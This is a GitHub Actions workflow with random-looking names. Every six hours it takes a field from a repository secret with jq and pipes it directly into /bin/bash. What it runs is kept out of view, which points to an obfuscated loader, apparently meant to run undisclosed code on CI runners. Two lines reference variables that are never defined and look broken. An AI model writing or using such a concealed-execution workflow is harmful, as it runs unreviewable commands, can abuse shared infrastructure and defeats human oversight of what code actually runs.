name: liangjiajiang9129

on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liangjiajiang9129
        env:
          bxu43110: ${{ secrets.bxu43110 }}
        run: |
          echo $bxu43110 | jq -r .mlu3942 | /bin/bash
          echo $eiigk52 | jq -r .ppjd47 | /bin/bash
          echo $y4 | jq -r .v271 | /bin/bash

